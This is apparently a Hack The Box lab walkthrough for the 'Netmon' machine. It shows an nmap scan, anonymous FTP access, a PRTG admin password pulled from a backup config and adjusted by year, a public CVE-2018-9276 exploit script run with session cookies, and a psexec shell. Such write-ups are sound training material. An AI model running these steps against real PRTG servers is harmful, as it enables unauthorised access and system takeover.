Skip to content

Netmon

Easy Internal Enumeration FTP Penetration Tester Level 1 Weak Authentication CVE-2018-9276 CVE Exploitation Public Vulnerabilities Remote Code Execution 

$ nmap -sV -sC -Pn --min-rate 10000 10.129.96.142
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 21:08 EDT
Nmap scan report for 10.129.96.142
Host is up (0.057s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
80/tcp  open  http        Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open  msrpc       Microsoft Windows RPC
139/tcp open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp open  tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-05-31T01:08:29
|_  start_date: 2022-05-31T01:06:52
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.05 seconds

$ ftp 10.129.96.142
Connected to 10.129.96.142.
220 Microsoft FTP Service
Name (10.129.96.142:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp>

Users\user.txt

after looking around and trying more, we found the files needed

ftp> cd "/ProgramData/Paessler/PRTG Network Monitor"
ftp> get "PRTG Configuration.old.bak"

the get "PRTG Configuration.old.bak" command sometimes close by itself, so do more until you get the full text or at least the required text

...
</dbcredentials>
    <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
    </dbpassword>
<dbtimeout>
...

but the password was wrong, if we look back at the date, we know that new Configuration was in 2019

...
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
...

when trying with PrTg@dmin2019, finally got it right

download github.com/chcx

$ chmod +x prtg-exploit.sh
$ ./prtg-exploit.sh -u http://10.129.96.142 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"

it will cread cred pentest:P3nT3st!. use psexec.py from impacket to get shell

$ ~/Documents/impacket/examples/psexec.py pentest:'P3nT3st!'@10.129.96.142

done